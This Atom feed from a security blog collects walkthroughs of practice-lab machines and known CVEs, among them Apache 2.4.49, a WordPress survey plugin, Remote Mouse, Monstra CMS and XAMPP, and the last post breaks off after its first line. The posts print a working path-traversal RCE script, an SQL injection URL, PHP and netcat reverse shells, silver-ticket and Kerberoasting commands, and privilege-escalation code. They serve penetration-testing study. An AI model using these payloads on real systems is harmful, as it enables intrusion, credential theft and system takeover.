<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="https://odabasi52.github.io/feed.xml" rel="self" type="application/atom+xml" /><link href="https://odabasi52.github.io/" rel="alternate" type="text/html" /><updated>2026-04-04T12:06:11+00:00</updated><id>https://odabasi52.github.io/feed.xml</id><title type="html">Exploit &amp;amp; Evolve</title><subtitle>[Exploit &amp; Evolve] your go-to hub for all things cybersecurity, CTF challenges, hands-on lab experiences, certification insights, and personal growth.</subtitle><author><name>Muhammet Talha Odabaşı</name></author><entry><title type="html">WiFi Mouse 1.8.3.2 exploit (CVE-2022-3218)</title><link href="https://odabasi52.github.io/2026/03/29/WiFi-Mouse-1.8.3.2-exploit.html" rel="alternate" type="text/html" title="WiFi Mouse 1.8.3.2 exploit (CVE-2022-3218)" /><published>2026-03-29T00:00:00+00:00</published><updated>2026-03-29T00:00:00+00:00</updated><id>https://odabasi52.github.io/2026/03/29/WiFi-Mouse-1.8.3.2-exploit</id><content type="html" xml:base="https://odabasi52.github.io/2026/03/29/WiFi-Mouse-1.8.3.2-exploit.html"><![CDATA[<h3 id="nmap">nmap</h3>
<p>Nmap scan revaled port 1978 was in use.</p>

<p><img width="783" height="213" alt="00nmap" src="https://github.com/user-attachments/assets/19aed76b-1e0f-4d79-b443-65ca873e8008" /></p>

<h3 id="share-and-exiftool">share and exiftool</h3>
<p>SMB Null enumeration was allowed and there was a share that included <code>MouseServer.exe</code>. Used <code>exiftool -a -u MouseServer.exe</code> and found out it was <code>1.8.2.5</code>.</p>

<p><img width="1134" height="688" alt="01version" src="https://github.com/user-attachments/assets/248709c1-72c9-44b7-82ee-f1de8310fd64" /></p>

<h3 id="wifi-mouse-1832-exploit-cve-2022-3218">WiFi Mouse 1.8.3.2 exploit (CVE-2022-3218)</h3>
<p>So some search revealed there was an application called WiFi Mouse and version below 1.8.3.2 is vulnerable to RCE.</p>

<p>I found <a href="https://www.exploit-db.com/exploits/51072">https://www.exploit-db.com/exploits/51072</a> exploit and fixed some indetation errors then executed it.</p>

<p>To execute it I created a reverse shell with msfvenom:</p>
<pre><code class="language-bash">msfvenom -p windows/x64/shell_reverse_tcp LHOST=&lt;LOCAL&gt; LPORT=443 -f exe -o exp.exe
</code></pre>

<p><img width="599" height="179" alt="02execute" src="https://github.com/user-attachments/assets/57b8c998-d3e3-480b-b8e3-0fb520fd2266" /></p>

<p>Then I got reverse shell.</p>]]></content><author><name>Muhammet Talha Odabaşı</name></author><category term="Other" /><summary type="html"><![CDATA[nmap Nmap scan revaled port 1978 was in use.]]></summary></entry><entry><title type="html">apache 2.4.49 exploit (CVE-2021-41773)</title><link href="https://odabasi52.github.io/2026/03/29/apache-2.4.49-exploit.html" rel="alternate" type="text/html" title="apache 2.4.49 exploit (CVE-2021-41773)" /><published>2026-03-29T00:00:00+00:00</published><updated>2026-03-29T00:00:00+00:00</updated><id>https://odabasi52.github.io/2026/03/29/apache-2.4.49-exploit</id><content type="html" xml:base="https://odabasi52.github.io/2026/03/29/apache-2.4.49-exploit.html"><![CDATA[<h3 id="nmap">nmap</h3>
<p>nmap scan revealed <code>apache 2.4.49</code> (<code>apache http server 2.4.49</code>)</p>

<p><img width="765" height="90" alt="00nmap" src="https://github.com/user-attachments/assets/89278130-e24a-46e1-9bea-9d3bbd940aa5" /></p>

<h3 id="searchsploit">searchsploit</h3>
<p>I found an exploit using searchsploit.</p>

<p><img width="1411" height="380" alt="01exploit" src="https://github.com/user-attachments/assets/8aaa7cea-fd6a-43f7-ab01-2f83de977598" /></p>

<pre><code class="language-bash"># Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal &amp; Remote Code Execution (RCE)
# Date: 10/05/2021
# Exploit Author: Lucas Souza https://lsass.io
# Vendor Homepage:  https://apache.org/
# Version: 2.4.49
# Tested on: 2.4.49
# CVE : CVE-2021-41773
# Credits: Ash Daulton and the cPanel Security Team

#!/bin/bash

if [[ $1 == '' ]]; [[ $2 == '' ]]; then
echo Set [TAGET-LIST.TXT] [PATH] [COMMAND]
echo ./PoC.sh targets.txt /etc/passwd
exit
fi
for host in $(cat $1); do
echo $host
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done

# PoC.sh targets.txt /etc/passwd
# PoC.sh targets.txt /bin/sh whoami
</code></pre>

<p>I then executed it to get RCE.</p>

<p><img width="380" height="90" alt="02gg" src="https://github.com/user-attachments/assets/f8d07e03-b315-4661-9394-5aaf0c3a0ac0" /></p>]]></content><author><name>Muhammet Talha Odabaşı</name></author><category term="Other" /><summary type="html"><![CDATA[nmap nmap scan revealed apache 2.4.49 (apache http server 2.4.49)]]></summary></entry><entry><title type="html">apache JAMES Remote Admin 2.3.2 exploit (CVE-2015-5205)</title><link href="https://odabasi52.github.io/2026/03/29/apache-james-exploit.html" rel="alternate" type="text/html" title="apache JAMES Remote Admin 2.3.2 exploit (CVE-2015-5205)" /><published>2026-03-29T00:00:00+00:00</published><updated>2026-03-29T00:00:00+00:00</updated><id>https://odabasi52.github.io/2026/03/29/apache-james-exploit</id><content type="html" xml:base="https://odabasi52.github.io/2026/03/29/apache-james-exploit.html"><![CDATA[<h3 id="nmap">nmap</h3>
<p>Nmap revealed <code>JAMES Remote Admin 2.3.2</code>.</p>

<p><img width="766" height="185" alt="00nmap" src="https://github.com/user-attachments/assets/765a4834-f9fb-46bf-ac3f-3ca4763b3065" /></p>

<h3 id="searchsploit">searchsploit</h3>
<p>Using searchsploit I found <a href="https://www.exploit-db.com/exploits/50347">https://www.exploit-db.com/exploits/50347</a> exploit and before executing I updated port values.</p>

<p><img width="1418" height="183" alt="01 0" src="https://github.com/user-attachments/assets/0e9449a0-3a7d-4ed2-994d-e0bf66e909e5" /></p>

<p>I then executed and once a user logged in I got a reverse shell.</p>

<p><img width="870" height="175" alt="01gg" src="https://github.com/user-attachments/assets/c54b4120-faf3-450a-b3e5-9862aab52b7d" /></p>

<h1 id="how-apache-james-remote-admin-232-exploit-works">How apache JAMES Remote Admin 2.3.2 exploit works</h1>
<p>The classic remote code execution (RCE) exploit for Apache James 2.3.2 (CVE-2015-5205) abuses a directory traversal vulnerability to write an email containing your payload directly into a global system directory, usually <code>/etc/bash_completion.d/</code>.</p>

<p>Then when a user logs in or simply opens an interactive bash shell, scripts under <code>/etc/bash_completion.d/</code> get executed.</p>]]></content><author><name>Muhammet Talha Odabaşı</name></author><category term="Other" /><summary type="html"><![CDATA[nmap Nmap revealed JAMES Remote Admin 2.3.2.]]></summary></entry><entry><title type="html">perfect-survey 1.5.1 exploit (CVE-2021-24762)</title><link href="https://odabasi52.github.io/2026/03/28/perfect-survey-1.5.1-exploit.html" rel="alternate" type="text/html" title="perfect-survey 1.5.1 exploit (CVE-2021-24762)" /><published>2026-03-28T00:00:00+00:00</published><updated>2026-03-28T00:00:00+00:00</updated><id>https://odabasi52.github.io/2026/03/28/perfect-survey-1.5.1-exploit</id><content type="html" xml:base="https://odabasi52.github.io/2026/03/28/perfect-survey-1.5.1-exploit.html"><![CDATA[<h3 id="wpscan">WPScan</h3>
<p>wpscan revealed <code>perfect-survey 1.5.1</code> was in use.</p>

<p><img width="709" height="212" alt="00wpscan" src="https://github.com/user-attachments/assets/721a3c39-fc8b-47d4-ae03-8d04f4d4619b" /></p>

<h3 id="exploit-cve-2021-24762">Exploit (CVE-2021-24762)</h3>
<p>It was vulnerable to sql injeciton. All I had to do was to visit below URL with given payload to get users and passwords.</p>

<pre><code>site.com/wp-admin/admin-ajax.php?action=get_question&amp;question_id=1 union select 1,1,char(116,101,120,116),user_login,user_pass,0,0,null,null,null,null,null,null,null,null,null from wp_users
</code></pre>

<p><img width="1280" height="668" alt="01exploit" src="https://github.com/user-attachments/assets/21ce170b-99cb-495f-9589-68137e8864bc" /></p>

<h3 id="hashcat">Hashcat</h3>
<p>I used hashcat with mode <code>400</code> and cracked it.</p>

<p><img width="432" height="94" alt="02cracked" src="https://github.com/user-attachments/assets/3105b155-2a3e-4566-8891-b9aea4502956" /></p>

<h3 id="rce">RCE</h3>
<p>Then I was able to login and get a reverse shell via custom plugin upload.</p>
<pre><code class="language-php">&lt;?php

/**
* Plugin Name: Wordpress Reverse Shell
* Author: mto

*/

exec("/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/&lt;IP&gt;/22 0&gt;&amp;1'")
?&gt;
</code></pre>

<p><img width="309" height="63" alt="05 zip" src="https://github.com/user-attachments/assets/68d6267c-1985-4153-b33f-cfccc5facd60" /></p>

<p><img width="1145" height="491" alt="06test zip" src="https://github.com/user-attachments/assets/516c4615-15a9-4c78-a789-c303593e24ba" /></p>

<p><img width="988" height="219" alt="07gg" src="https://github.com/user-attachments/assets/c173c591-7ea9-4c1c-a063-18545297f8cc" /></p>]]></content><author><name>Muhammet Talha Odabaşı</name></author><category term="Other" /><summary type="html"><![CDATA[WPScan wpscan revealed perfect-survey 1.5.1 was in use.]]></summary></entry><entry><title type="html">Mice - Proving Grounds Practice</title><link href="https://odabasi52.github.io/2026/03/21/pg-practice-mice.html" rel="alternate" type="text/html" title="Mice - Proving Grounds Practice" /><published>2026-03-21T00:00:00+00:00</published><updated>2026-03-21T00:00:00+00:00</updated><id>https://odabasi52.github.io/2026/03/21/pg-practice-mice</id><content type="html" xml:base="https://odabasi52.github.io/2026/03/21/pg-practice-mice.html"><![CDATA[<h2 id="enumeration">Enumeration</h2>
<h3 id="nmap">Nmap</h3>
<p>Initial nmap scan revealed RDP and Remote Mouse ports were open.</p>

<p><img width="785" height="525" alt="00nmap" src="https://github.com/user-attachments/assets/04150304-951c-4b9b-95cf-e9bd636fd422" /></p>

<h2 id="exploitation">Exploitation</h2>
<h3 id="remote-mouse-3008-rce">Remote Mouse 3.008 RCE</h3>
<p><code>Remote Mouse 3.008</code> was vulnerable to remote code execution by sending arbitary mouse signals. So some research revealed <a href="https://github.com/p0dalirius/RemoteMouse-3.008-Exploit">p0dalirius/RemoteMouse-3.008-Exploit</a> which allows you to send any command you want.</p>

<ul>
  <li>At first I transfered nc64.exe
    <pre><code class="language-bash">python RemoteMouse-3.008-Exploit.py -t 192.168.224.199 -c 'powershell iwr http://192.168.45.216/nc64.exe -outfile C:\ProgramData\nc64.exe' -v
</code></pre>
  </li>
  <li>Then I executed it and obtained reverse shell
    <pre><code class="language-bash">python RemoteMouse-3.008-Exploit.py --target-ip 192.168.224.199 --cmd 'powershell -c "C:\ProgramData\nc64.exe 192.168.45.216 80 -e cmd.exe"' -v
</code></pre>
  </li>
  <li>Ports other than port 80 was not working. So I had to use port 80.</li>
</ul>

<p>Then I simply read local flag.</p>

<p><img width="718" height="682" alt="01local" src="https://github.com/user-attachments/assets/9cdf3e20-5589-45ed-95c5-16957883bb71" /></p>

<h2 id="privilege-escalation">Privilege Escalation</h2>
<h3 id="filezilla-password-recentserversxml">FileZilla Password (recentservers.xml)</h3>
<p>I executed <code>WinPEAS.exe</code> and found two available FileZilla files.</p>
<ol>
  <li><code>C:\Users\divine\AppData\Roaming\FileZilla\filezilla.xml</code> → version etc.</li>
  <li><code>C:\Users\divine\AppData\Roaming\FileZilla\recentservers.xml</code> → session information, password etc.</li>
</ol>

<p><img width="533" height="69" alt="02filezilla" src="https://github.com/user-attachments/assets/d39ef1ee-5090-481c-ae28-6c57cfd2a399" /></p>

<p>I read both of them. I noted FileZilla version then read base64 encoded FileZilla password.</p>

<p><img width="881" height="219" alt="03filezillaversion" src="https://github.com/user-attachments/assets/cccf8b44-c9d0-4168-ba08-0aca44050766" /></p>

<p><img width="659" height="324" alt="04recentservers" src="https://github.com/user-attachments/assets/dd4f799f-782e-4a59-94a3-35e4b1e35745" /></p>

<p>Then I decoded the password and RDP into same user we got reverse shell.</p>

<p><img width="1576" height="736" alt="05rdp" src="https://github.com/user-attachments/assets/08663693-0793-4683-b8e9-c9e279df6e8b" /></p>

<h3 id="cve-2021-35448">CVE-2021-35448</h3>
<p>Emote Interactive Remote Mouse 3.008 on Windows allows attackers to execute arbitrary programs as Administrator by using the Image Transfer Folder feature to navigate to cmd.exe. It binds to local ports to listen for incoming connections.</p>

<p>This version of Remote Mouse was vulnerable to GUI based Privilege Escalation and as we have RDP session we could exploit this.</p>

<ol>
  <li>Open Remote Mouse from the system tray</li>
  <li>Go to “Settings”</li>
  <li>Click “Change…” in “Image Transfer Folder” section</li>
</ol>

<p><img width="1027" height="794" alt="06systemtray" src="https://github.com/user-attachments/assets/cb919e7c-bca7-4c64-8c8e-3b5533841607" /></p>

<ol>
  <li>“Save As” prompt will appear</li>
  <li>Enter “C:\Windows\System32\cmd.exe” in the address bar and click enter</li>
</ol>

<p><img width="621" height="311" alt="07cmd" src="https://github.com/user-attachments/assets/9ef014d3-2bb9-4353-a776-79ca32f5ec4d" /></p>

<ol>
  <li>A new command prompt is spawned with SYSTEM privileges</li>
</ol>

<p>Then I simply read Administrator flag.</p>

<p><img width="698" height="580" alt="08gg" src="https://github.com/user-attachments/assets/a3b44ddf-c3b7-48d5-b42c-aec76d6df712" /></p>]]></content><author><name>Muhammet Talha Odabaşı</name></author><category term="Other" /><summary type="html"><![CDATA[Enumeration Nmap Initial nmap scan revealed RDP and Remote Mouse ports were open.]]></summary></entry><entry><title type="html">Nagoya - Proving Grounds Practice</title><link href="https://odabasi52.github.io/2026/03/21/pg-practice-nagoya.html" rel="alternate" type="text/html" title="Nagoya - Proving Grounds Practice" /><published>2026-03-21T00:00:00+00:00</published><updated>2026-03-21T00:00:00+00:00</updated><id>https://odabasi52.github.io/2026/03/21/pg-practice-nagoya</id><content type="html" xml:base="https://odabasi52.github.io/2026/03/21/pg-practice-nagoya.html"><![CDATA[<h2 id="enumeration">Enumeration</h2>
<h3 id="nmap">Nmap</h3>
<p>Initial nmap scan revealed common DC ports.</p>

<p><img width="1128" height="422" alt="00nmap" src="https://github.com/user-attachments/assets/58be6cab-986f-497e-a253-f65ffb9eb666" /></p>

<p>I added necessary domains to <code>/etc/hosts</code> file.</p>

<p><img width="861" height="329" alt="01 0 etc hosts" src="https://github.com/user-attachments/assets/97c84de2-d608-4c57-b7a3-a572ca6d9770" /></p>

<h3 id="web-enumeration">Web Enumeration</h3>
<p>Website included many names.</p>

<p><img width="1318" height="687" alt="01web" src="https://github.com/user-attachments/assets/3191d995-0702-4282-b9cf-696c924e009e" /></p>

<h2 id="exploitation">Exploitation</h2>
<h3 id="user-enumeration">User Enumeration</h3>
<p>So using <code>username-anarchy</code>, I created a userList.</p>

<p><img width="625" height="330" alt="02userList" src="https://github.com/user-attachments/assets/1c345ba1-30cf-4319-99d1-e3d9d8c64821" /></p>

<p>Then using <code>kerbrute</code>, I applied user enumeration and noted valid usernames.</p>

<p><img width="987" height="714" alt="03validusers" src="https://github.com/user-attachments/assets/823996c6-2242-4c96-b958-17664d3451a1" /></p>

<h3 id="password-spraying">Password Spraying</h3>
<p>Later, I tried many techniques and non of them worked. Then I found that the website was created in 2023.</p>

<p><img width="1324" height="814" alt="04nagoya" src="https://github.com/user-attachments/assets/64ab4da2-3b9a-451f-8221-5af286ed702b" /></p>

<p>So using <code>cewl</code> I created wordlist then appended <code>2023</code> and <code>2023!</code> at the end of each record using below command.</p>

<pre><code class="language-bash">for i in $(cat password); do echo $i; echo ${i}2022; echo ${i}2023; echo ${i}\! ;done &gt; pass.txt
</code></pre>

<p>Then I applied brute force using <code>kerbrute</code> and found valid credentials.</p>

<p><img width="1019" height="723" alt="05found" src="https://github.com/user-attachments/assets/fbd0a061-9d1d-4988-a7b9-8aa95e74b4ee" /></p>

<h3 id="bloodhound">BloodHound</h3>
<p>Then I executed <code>bloodhound-python</code>.</p>

<pre><code class="language-bash">bloodhound-python -u 'andrea.hayes' -p 'Nagoya2023' -c all -ns 192.168.224.21 -d nagoya-industries.com --zip
</code></pre>

<p><img width="959" height="355" alt="06bloodhound" src="https://github.com/user-attachments/assets/61d2a7e5-2d3a-43a7-b3eb-8cb48d1d9bea" /></p>

<p>And it revealed a path where I can apply force change password twice to get winRM shell.</p>

<p><img width="962" height="503" alt="07longway" src="https://github.com/user-attachments/assets/371f92a4-affa-492f-b796-5813cfbb93c6" /></p>

<p>I used below command to change user’s password.</p>

<pre><code class="language-bash">net rpc password "CHRISTOPHER.LEWIS" "Test1234." -U "nagoya-industries.com"/"iain.white"%"Test1234." -S "192.168.224.21"
</code></pre>

<p><img width="1488" height="405" alt="08gg" src="https://github.com/user-attachments/assets/8f05680a-b369-4a80-81b7-46dc8587941f" /></p>

<p>Then I obtained user flag and winrm shell.</p>

<p><img width="1039" height="736" alt="09localflag" src="https://github.com/user-attachments/assets/9fc3c421-f514-4219-93f8-ceb8ab7b11db" /></p>

<h2 id="privilege-escalation">Privilege Escalation</h2>
<h3 id="kerberoasting">Kerberoasting</h3>
<p>Later I applied kerberoasting using <code>impacket-GetUserSPNs</code>.</p>

<pre><code class="language-bash">impacket-GetUserSPNs nagoya-industries.com/'CHRISTOPHER.LEWIS':'Test1234.' -request
</code></pre>

<p><img width="1478" height="686" alt="10sus" src="https://github.com/user-attachments/assets/f34ef607-78a9-4852-8708-480714e074d1" /></p>

<p>And I was able to crack <code>svc_mssql</code> password.</p>

<p><img width="1486" height="654" alt="11cracked" src="https://github.com/user-attachments/assets/3abe1edf-7837-4e36-ae94-6c9f9df37908" /></p>

<h3 id="mssql-service">MSSQL Service</h3>
<p>At first I tried many methods but could not find anything useful. Then I found MSSQL service is up but unreachable from outside.</p>

<p><img width="686" height="370" alt="12suspicious" src="https://github.com/user-attachments/assets/65b9a435-6b3f-4acd-a201-df2004c58d8f" /></p>

<p>So I tried to exploit it locally with <code>PowerUpSQL</code> but I could not.</p>

<p>Later I set up <code>ligolo-ng</code> as shown below to reach local MSSQL service.</p>
<ol>
  <li>I set up an proxy</li>
</ol>

<p><img width="1359" height="799" alt="15proxy" src="https://github.com/user-attachments/assets/9ed5bb94-33f5-4624-a609-7e281cb7f33d" /></p>

<ol>
  <li>I executed the agent.exe</li>
</ol>

<p><img width="888" height="88" alt="14agent" src="https://github.com/user-attachments/assets/2838a54e-2558-4df1-8276-aa748a3478b6" /></p>

<p>With that setup, I was able to login to mssql. But to login I change <code>/etc/hosts</code> to <code>240.0.0.1</code>.</p>

<p><img width="718" height="204" alt="16mssql login" src="https://github.com/user-attachments/assets/6b99e03f-73d7-4f10-9f9f-9150c642c676" /></p>

<h3 id="silver-ticket">Silver Ticket</h3>
<p>However, I had no permission, there were no links or no impersonation. So, as I am the service account I could exploit Silver Ticket to login MSSQL as administrator.</p>

<ol>
  <li>Generate NTLM hash for service account</li>
</ol>

<p><img width="1825" height="829" alt="17 0 ntlm" src="https://github.com/user-attachments/assets/5bf2772f-473c-4973-9685-388f6b70eb25" /></p>

<ol>
  <li>Create an administrator ticket using <code>impacket-ticketer</code></li>
</ol>

<pre><code class="language-bash">impacket-ticketer -nthash "E3A0168BC21CFB88B95C954A5B18F57C" -domain-sid "S-1-5-21-1969309164-1513403977-1686805993" -spn "MSSQL/nagoya.nagoya-industries.com"  -domain "nagoya-industries.com" -user-id 500 "Administrator"
</code></pre>

<p><img width="1483" height="296" alt="17silver ticket" src="https://github.com/user-attachments/assets/cffa1954-f9f9-433e-ad23-882f1524d7c1" /></p>

<ol>
  <li>Using <code>KRB55CCNAME</code> inject this ticket to obtain administrator MSSQL login.</li>
</ol>

<pre><code class="language-bash">KRB5CCNAME=Administrator.ccache impacket-mssqlclient -k nagoya.nagoya-industries.com
</code></pre>

<p><img width="1211" height="704" alt="18zort" src="https://github.com/user-attachments/assets/3dc1a853-30d8-4e89-973c-0ea7de2354d8" /></p>

<h3 id="xp_cmdshell">xp_cmdshell</h3>
<p>Later, I simply executed <code>xp_cmdshell</code> to obtain reverse shell.</p>

<pre><code class="language-sql">EXEC xp_cmdshell 'cmd /c C:\temp\nc64.exe 192.168.45.216 445 -e cmd.exe'
</code></pre>

<p>And I obtained the shell.</p>

<p><img width="722" height="389" alt="19revshell" src="https://github.com/user-attachments/assets/228cdb17-2bc5-458b-821f-bcbd2e1d7d8a" /></p>

<h3 id="seimpersonateprivilege-godpatato">SeImpersonatePrivilege (GodPatato)</h3>
<p>Then I downloaded GodPatato (<a href="https://github.com/BeichenDream/GodPotato">BeichenDream/GodPotato</a>) and executed it to obtain SYSTEM reverse shell.</p>

<p><img width="840" height="505" alt="20godpatato" src="https://github.com/user-attachments/assets/d514ef3e-bd47-40b9-a61c-445291ec494a" /></p>

<p>I simply read Administrator flag.</p>

<p><img width="845" height="707" alt="21gg" src="https://github.com/user-attachments/assets/781b45e7-6ccd-4780-a8cf-6d4a63a8592c" /></p>]]></content><author><name>Muhammet Talha Odabaşı</name></author><category term="Other" /><summary type="html"><![CDATA[Enumeration Nmap Initial nmap scan revealed common DC ports.]]></summary></entry><entry><title type="html">Monster - Proving Grounds Practice</title><link href="https://odabasi52.github.io/2026/03/20/pg-practice-monster.html" rel="alternate" type="text/html" title="Monster - Proving Grounds Practice" /><published>2026-03-20T00:00:00+00:00</published><updated>2026-03-20T00:00:00+00:00</updated><id>https://odabasi52.github.io/2026/03/20/pg-practice-monster</id><content type="html" xml:base="https://odabasi52.github.io/2026/03/20/pg-practice-monster.html"><![CDATA[<h2 id="enumeration">Enumeration</h2>
<h3 id="nmap">Nmap</h3>
<p>Initial nmap scan revealed SMB, MySQL and HTTP ports were open.</p>

<p><img width="937" height="714" alt="00nmap" src="https://github.com/user-attachments/assets/496e6fd6-565e-4597-bacd-a9102e847d6e" /></p>

<h3 id="website">Website</h3>
<p>Initial website was static website.</p>

<p><img width="1116" height="646" alt="01static" src="https://github.com/user-attachments/assets/d4728704-f592-45e9-84c5-d63912d981e0" /></p>

<p>So I applied directory brute force and found <code>/blog</code> endpoint.</p>

<p><img width="953" height="607" alt="02blog" src="https://github.com/user-attachments/assets/5e899959-ac86-42d5-88c5-6ba33c238a1b" /></p>

<p>The website was redirecting us to <code>monster.pg</code> domain.</p>

<p><img width="669" height="704" alt="03admin" src="https://github.com/user-attachments/assets/5f0ee5bd-0b3f-4d71-a285-6b79ecab0c58" /></p>

<p>So I added it to <code>/etc/hosts</code> file.</p>

<p><img width="797" height="246" alt="04hosts" src="https://github.com/user-attachments/assets/41206858-3851-495a-acd3-933410de643d" /></p>

<p>The blog website was <code>Monstra 3.0.4</code></p>

<p><img width="1113" height="572" alt="05sus" src="https://github.com/user-attachments/assets/0151ed32-dca6-484c-acd7-9d27487b6478" /></p>

<h2 id="exploitation">Exploitation</h2>
<h3 id="brute-force">Brute Force</h3>
<p>At first I tried default credentials but non of them worked. Then I used cewl to create a wordlist.</p>
<pre><code class="language-bash">cewl http://monster.pg/ &gt; passlist
</code></pre>

<p>And then I applied hydra brute force and found password for admin user.</p>
<pre><code class="language-bash">hydra -l admin -P passlist monster.pg http-post-form '/blog/admin/:login=^USER^&amp;password=^PASS^&amp;login_submit=Log+In:F=Wrong' -I -f -V
</code></pre>

<p><img width="1118" height="154" alt="07foundit" src="https://github.com/user-attachments/assets/ec408515-491a-41cd-8237-bdb8f11bcc62" /></p>

<h3 id="monstra-304-rce">Monstra 3.0.4 RCE</h3>
<p>Later I found this (<a href="https://github.com/monstra-cms/monstra/issues/470">https://github.com/monstra-cms/monstra/issues/470</a>) github repository which explain how to abuse this version to get a reverse shell.</p>
<ol>
  <li>Log into the panel.</li>
  <li>Go to “/monstra-3.0.4/admin/index.php?id=themes&amp;action=edit_template&amp;filename=blog”</li>
  <li>Click edit Blog</li>
  <li>Insert payload easy-simple-php-webshell.php</li>
  <li>Reload page review code excution</li>
</ol>

<p>So I used <a href="https://github.com/ivan-sincek/php-reverse-shell">ivan-sincek/php-reverse-shell</a> to create a reverse shell and updated IP and port values.</p>

<p><img width="1120" height="664" alt="08ivansincek" src="https://github.com/user-attachments/assets/8454572c-08d8-4bd6-8534-c8ac118be77d" /></p>

<p>Later, I visited the created page <code>blog</code> which is located at <code>/blog/blog</code> and got a reverse shell.</p>

<p><img width="1086" height="888" alt="09local" src="https://github.com/user-attachments/assets/c0d90a56-3b4d-4d79-b3d3-4dbe0cedd9f5" /></p>

<h2 id="privilege-escalation">Privilege Escalation</h2>
<h3 id="userstablexml-decryption">users.table.xml decryption</h3>
<p>At first I found <code>users.table.xml</code> file located at <code>C:\xampp\htdocs\blog\storage</code>.</p>

<p><img width="1112" height="150" alt="10 0 userstablexml" src="https://github.com/user-attachments/assets/7d239636-1297-4b70-93af-f296890595f0" /></p>

<p>Then using an online purifier (<a href="https://jsonformatter.org/xml-formatter">https://jsonformatter.org/xml-formatter</a>) I purified the XML output.</p>

<p><img width="788" height="743" alt="10 1 purify userstablexml" src="https://github.com/user-attachments/assets/8c9eade0-759b-41b4-97b5-ec9650581f22" /></p>

<p>We already knew admin password but there was another user. While checking I found this post (<a href="https://simpleinfoseccom.wordpress.com/2018/05/27/monstra-cms-3-0-4-unauthenticated-user-credential-exposure/">https://simpleinfoseccom.wordpress.com/2018/05/27/monstra-cms-3-0-4-unauthenticated-user-credential-exposure/</a>)
which explain how passwords are stored in <code>users.table.xml</code> file.</p>

<p>To understand it even more I checked <code>Security.php</code> file under <code>C:\xampp\htdocs\blog\engine</code> and found encryption code.</p>
<pre><code class="language-php">/**
* Encrypt password
*
*  &lt;code&gt;
*      $encrypt_password = Security::encryptPassword('password');
*  &lt;/code&gt;
*
* @param string $password Password to encrypt
*/

public static function encryptPassword($password)
{
    return md5(md5(trim($password) . MONSTRA_PASSWORD_SALT));
}
</code></pre>

<p>It was simply concataneting password and salt then applying MD5 twice. So I checked <code>defines.php</code> file under <code>C:\xampp\htdocs\blog\boot</code> which showed salt value.</p>
<pre><code class="language-php">/**
 * Set password salt
 */

define('MONSTRA_PASSWORD_SALT', 'YOUR_SALT_HERE');
</code></pre>

<p>So it was simply <code>YOUR_SALT_HERE</code>. I could now crack the passwords. I tried to crack it with <code>rockyou.txt</code> using <code>hashcat</code> with mode <code>2630</code> and it worked. I cracked it.</p>

<p><img width="651" height="341" alt="14cracked" src="https://github.com/user-attachments/assets/1b2e08ee-f5e3-44b9-8485-9ec0e53986b5" /></p>

<p>However, it was not useful because I already got mike shell and it was mike’s password.</p>

<p><img width="1117" height="110" alt="15mike14" src="https://github.com/user-attachments/assets/8213e275-81c6-4ad5-a391-ffc8d7d87ee8" /></p>

<h3 id="cve-2020-11107">CVE-2020-11107</h3>
<p>An issue was discovered in XAMPP before 7.2.29, 7.3.x before 7.3.16 , and 7.4.x before 7.4.4 on Windows. An unprivileged user can change a .exe configuration in xampp-contol.ini for all users (including admins) to enable arbitrary command execution.</p>

<p>So later, I executed <code>WinPEAS.exe</code> and found I had write privileges over <code>C:\xampp</code>. Some research revealed there was a CVE assigned to it.</p>

<p><img width="1114" height="429" alt="16suspicious" src="https://github.com/user-attachments/assets/dc1c632c-8d85-41de-a78a-1e112401d696" /></p>

<p>I found this repo (<a href="https://github.com/Mohnad-AL-saif/Mohnad-AL-saif-CVE-2020-11107-XAMPP-Local-Privilege-Escalation">Mohnad-AL-saif/Mohnad-AL-saif-CVE-2020-11107-XAMPP-Local-Privilege-Escalation</a>)
which explains this exploitation in detail.</p>

<p>At first I checked the version using <code>type C:\xampp\properties.ini</code>.</p>

<p><img width="514" height="479" alt="ver" src="https://github.com/user-attachments/assets/25989b27-8b34-46e0-9012-2fc43ead5668" /></p>

<p>It was vulnerable. So I created a malicious executable using <code>C</code> and <code>i686-w64-mingw32-gcc</code> after transferring nc64.exe file.</p>
<pre><code class="language-c">#include &lt;stdlib.h&gt;

int main(void){
     system("C:\\ProgramData\\nc64.exe 192.168.45.216 445 -e cmd.exe");
    return 0;
} 
</code></pre>
<pre><code class="language-bash">i686-w64-mingw32-gcc exp.c -l ws2_32 -o exp.exe
</code></pre>

<p>Then I created a temp folder using <code>mkdir C:\temp</code> and I transfered my malicious file to here using <code>powershell iwr http://192.168.45.216/exp.exe -outfile C:\temp\msf.exe</code>.</p>

<p>Then I created a powershell script to exploit this.</p>
<pre><code class="language-ps"># CVE-2020-11107 PoC
$file = "C:\xampp\xampp-control.ini"
$find = ((Get-Content $file)[2] -Split "=")[1]
$replace = "C:\temp\msf.exe"
(Get-Content $file) -replace $find, $replace | Set-Content $file
</code></pre>

<p>Later I simply executed the ps1 payload using <code>powershell -ExecutionPolicy Bypass -File exp.ps1</code> and started waiting.</p>

<p><img width="511" height="240" alt="20expps1" src="https://github.com/user-attachments/assets/ed6e9180-3f6d-472b-84f8-52fbf8327c97" /></p>

<p>After sometime I got administrator shell.</p>

<p><img width="752" height="742" alt="21root" src="https://github.com/user-attachments/assets/85490ca4-9ed0-4279-8404-535cc638bb93" /></p>]]></content><author><name>Muhammet Talha Odabaşı</name></author><category term="Other" /><summary type="html"><![CDATA[Enumeration Nmap Initial nmap scan revealed SMB, MySQL and HTTP ports were open.]]></summary></entry><entry><title type="html">Medjed - Proving Grounds Practice</title><link href="https://odabasi52.github.io/2026/03/19/pg-practice-medjed.html" rel="alternate" type="text/html" title="Medjed - Proving Grounds Practice" /><published>2026-03-19T00:00:00+00:00</published><updated>2026-03-19T00:00:00+00:00</updated><id>https://odabasi52.github.io/2026/03/19/pg-practice-medjed</id><content type="html" xml:base="https://odabasi52.github.io/2026/03/19/pg-practice-medjed.html"><![CDATA[<h2 id="1st-way---directly-system">1st Way - Directly SYSTEM</h2>
<h3 id="nmap">Nmap</h3>
<p>Initial nmap scan revealed SMB, MySQL and HTTP 8000 ports were open.</p>

